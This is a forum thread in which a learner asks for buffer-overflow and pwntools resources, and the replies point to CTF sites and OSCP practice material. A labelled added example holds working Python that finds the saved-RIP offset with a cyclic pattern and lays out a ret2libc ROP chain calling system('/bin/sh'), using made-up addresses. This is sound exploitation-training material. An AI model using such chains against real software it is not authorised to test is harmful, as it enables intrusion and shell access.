Learning binary exploitation/BoF

I often come up against challenges involving BoF and I never seem to get much further than overwriting RIP. Are there any good resources for learning it in practice? I’m particularly interested in pwntools.



  • Do pwn challenges, learn ret2libc ROP, IppSec made a video called Bitterman, try the Frolic box.
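The two steps the thread points at after "I can overwrite RIP" (find the exact offset, then lay out a ret2libc ROP chain), as an added example that is not part of any post above. It is plain Python rather than pwntools so it runs offline; the functions mirror what pwntools' `cyclic()`, `cyclic_find()`, `p64()` and `ROP` do for you. The gadget, libc-base and string addresses are made up for a hypothetical non-PIE x86-64 binary with a leaked libc base; substitute the ones you find with `ROPgadget`/`ropper` and `readelf -s`.

```python
# Added example for this thread (not code from any poster or from pwntools).
# Offset discovery with a de Bruijn pattern, then a ret2libc chain layout.
import functools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet=ALPHABET, n=4):
    """B(k, n) sequence: every n-byte window occurs exactly once (Ruskey's algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length, alphabet=ALPHABET, n=4):
    """First `length` bytes of the pattern, like pwntools' cyclic()."""
    return de_bruijn(alphabet, n)[:length]


def cyclic_find(value, alphabet=ALPHABET, n=4):
    """Offset of an n-byte window in the pattern (-1 if absent).
    `value` is either raw bytes or the integer you read out of a register or [rsp]
    in gdb; only its low n bytes are needed because every n-window is unique."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return de_bruijn(alphabet, n).find(value[:n])


def p64(x):
    """Little-endian 64-bit pack, same as pwntools' p64()."""
    return struct.pack("<Q", x)


def ret2libc_chain(offset, pop_rdi_ret, binsh, system, ret_gadget=None):
    """padding | [ret] | pop rdi; ret | &"/bin/sh" | system
    The bare `ret` gadget is optional: on x86-64 glibc system() expects a
    16-byte aligned stack (movaps inside it faults otherwise), and a single
    extra `ret` shifts rsp by 8 to fix that when the offset leaves it misaligned."""
    chain = b"A" * offset
    if ret_gadget is not None:
        chain += p64(ret_gadget)
    chain += p64(pop_rdi_ret) + p64(binsh) + p64(system)
    return chain


def bad_byte_offsets(payload, avoid=b"\n"):
    """Offsets of bytes the input sink would stop on, ignoring trailing nulls.
    gets()/fgets() stop at '\\n'; for a strcpy-style sink pass b"\\x00" and expect
    every x86-64 address to fail, since they all carry high zero bytes."""
    return [i for i, b in enumerate(payload.rstrip(b"\x00")) if b in avoid]


def demo(offset=72):
    """Constructed scenario: the pattern overflowed a buffer and the qword left at
    [rsp] when `ret` faulted was copied out of gdb. Returns (found_offset, chain)."""
    pattern = cyclic(200)
    faulting_qword = struct.unpack("<Q", pattern[offset:offset + 8])[0]
    found = cyclic_find(faulting_qword)
    # Assumed addresses for a hypothetical target; not from any real binary.
    pop_rdi_ret = 0x4012c3
    ret_gadget = 0x40101a
    libc_base = 0x7f5b0c200000
    system = libc_base + 0x52290
    binsh = libc_base + 0x1b45bd
    chain = ret2libc_chain(found, pop_rdi_ret, binsh, system, ret_gadget)
    return found, chain


if __name__ == "__main__":
    found, chain = demo()
    print(f"offset to saved RIP: {found}")
    print(f"bad bytes at: {bad_byte_offsets(chain)}")
    for i in range(found, len(chain), 8):
        print(f"{i:3d}: {struct.unpack('<Q', chain[i:i + 8])[0]:#018x}")
```

With pwntools the same flow is `cyclic(200)` to crash, `cyclic_find(p.corefile.read(p.corefile.rsp, 4))` for the offset, and `flat([b"A" * off, ret, pop_rdi, binsh, system])` or a `ROP(libc)` object for the chain; the pure-Python version above is there so the layout is visible byte by byte.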


  • I learned a lot from the SLMail example that is used on the OSCP, although outside of the lab period trying to find version (I think) 5.5 was difficult - there are lots of writeups about it. Also, John Hammond mentioned a really good technique for getting shells using BoF; check out his OSCP video - wish I had seen it before the course, it makes logical sense.

  • https://ropemporium.com/ - another good site for learning techniques

  • dostackbufferoverflowgood is what made me understand; BoF was the thing I was most scared about for the OSCP.

  • Also, if you are not new to binary exploitation and are looking for a site to exercise and develop your skills further, then https://pwnable.tw/ is also a great resource with some very challenging exercises.

